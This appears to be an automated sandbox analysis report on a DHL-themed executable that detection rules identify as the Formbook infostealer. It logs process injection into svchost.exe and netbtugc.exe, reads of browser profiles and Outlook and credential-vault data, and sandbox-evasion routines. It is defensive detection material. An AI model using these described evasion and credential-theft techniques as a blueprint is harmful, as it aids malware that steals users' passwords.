Source: 0000000A.00000002.3714293337.0000000002750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1402648327.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3724137057.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1403351196.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3726222348.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3724240548.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/7

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_004637B5 GetLastError,FormatMessageW,

0_2_004637B5

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_004510BF AdjustTokenPrivileges,CloseHandle,		0_2_004510BF
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_004516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004516C3

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_004651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_004651CD

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0047A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0047A67C

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0046648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0046648E

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_003F42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_003F42A2

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

File created: C:\Users\user~1\AppData\Local\Temp\caulds

Jump to behavior

Source: DHL-DOC83972025-1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 0000000A.00000003.1685253972.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3718390365.0000000002B24000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3718390365.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1687023189.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL-DOC83972025-1.exe	ReversingLabs: Detection: 47%
Source: DHL-DOC83972025-1.exe	Virustotal: Detection: 33%

Source: unknown	Process created: C:\Users\user\Desktop\DHL-DOC83972025-1.exe "C:\Users\user\Desktop\DHL-DOC83972025-1.exe"
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL-DOC83972025-1.exe"
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL-DOC83972025-1.exe"	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: DHL-DOC83972025-1.exe

Static file information: File size 1579008 > 1048576

Source: DHL-DOC83972025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DHL-DOC83972025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DHL-DOC83972025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DHL-DOC83972025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DHL-DOC83972025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DHL-DOC83972025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DHL-DOC83972025-1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000000.1326537881.0000000000F6E000.00000002.00000001.01000000.00000005.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000000.1470349122.0000000000F6E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL-DOC83972025-1.exe, 00000000.00000003.1259376214.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, DHL-DOC83972025-1.exe, 00000000.00000003.1256891997.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1311661371.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1313458028.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402895446.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402895446.0000000003000000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3724603113.0000000003140000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3724603113.00000000032DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1405176175.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1403036801.0000000002DDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL-DOC83972025-1.exe, 00000000.00000003.1259376214.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, DHL-DOC83972025-1.exe, 00000000.00000003.1256891997.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1311661371.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1313458028.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402895446.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402895446.0000000003000000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000002.3724603113.0000000003140000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3724603113.00000000032DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1405176175.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1403036801.0000000002DDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1371717132.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402794512.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000003.1342791960.000000000136B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 0000000A.00000002.3725601307.000000000376C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3718390365.0000000002A6E000.00000004.00000020.00020000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.000000000287C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1791268128.0000000029D7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 0000000A.00000002.3725601307.000000000376C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3718390365.0000000002A6E000.00000004.00000020.00020000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.000000000287C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1791268128.0000000029D7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1371717132.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402794512.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000003.1342791960.000000000136B000.00000004.00000020.00020000.00000000.sdmp

Source: DHL-DOC83972025-1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DHL-DOC83972025-1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DHL-DOC83972025-1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DHL-DOC83972025-1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DHL-DOC83972025-1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_003F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_003F42DE

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00410A76 push ecx; ret	0_2_00410A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B48A9 push esp; ret	2_2_003B48AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003CE2BA push 00000038h; iretd	2_2_003CE2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003CA436 push ebx; iretd	2_2_003CA600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003C8C92 pushad ; retf	2_2_003C8C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003CA5D9 push ebx; iretd	2_2_003CA600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003C47A2 push es; iretd	2_2_003C47AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B3780 push eax; ret	2_2_003B3782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B17E5 push ebp; retf 003Fh	2_2_003B17E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx	2_2_030309B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0314225F pushad ; ret	10_2_031427F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031427FA pushad ; ret	10_2_031427F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031709AD push ecx; mov dword ptr [esp], ecx	10_2_031709B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0314283D push eax; iretd	10_2_03142858
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02762238 pushad ; iretd	10_2_02762239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0276AB37 push 00000038h; iretd	10_2_0276AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02766E56 push ebx; iretd	10_2_02766E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02760EAB push ebp; retf	10_2_02760EAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02766CB3 push ebx; iretd	10_2_02766E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0276101F push es; iretd	10_2_02761027
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02751126 push esp; ret	10_2_02751127
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0276D1B0 push es; ret	10_2_0276D1D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0276550F pushad ; retf	10_2_02765510
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0276FEF5 push FFFFFFBAh; ret	10_2_0276FEF7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0275FFA0 push esi; iretd	10_2_0275FFA5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F7429A push cs; retf	10_2_02F742F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F74268 push cs; retf	10_2_02F742F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F703DA push ebx; ret	10_2_02F7042C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F7D620 push esi; ret	10_2_02F7D63B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F747F5 push es; ret	10_2_02F747FA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F7344F push cs; ret	10_2_02F73450

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0040F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0040F98E
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00481C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00481C41

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-96486

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	API/Special instruction interceptor: Address: 1187114
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\netbtugc.exe

Window / User API: threadDelayed 9677

Jump to behavior

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7460	Thread sleep count: 296 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7460	Thread sleep time: -592000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7460	Thread sleep count: 9677 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7460	Thread sleep time: -19354000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe TID: 7516	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe TID: 7516	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe TID: 7516	Thread sleep time: -37000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0042C2A2 FindFirstFileExW,	0_2_0042C2A2
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_004668EE FindFirstFileW,FindClose,	0_2_004668EE
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0046698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0046698F
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0045D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0045D076
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0045D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0045D3A9
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00469642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00469642
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0046979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046979D
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00469B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00469B2B
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0045DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0045DBBE
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00465C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00465C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0276BAB0 FindFirstFileW,FindNextFileW,FindClose,	10_2_0276BAB0

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_003F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_003F42DE

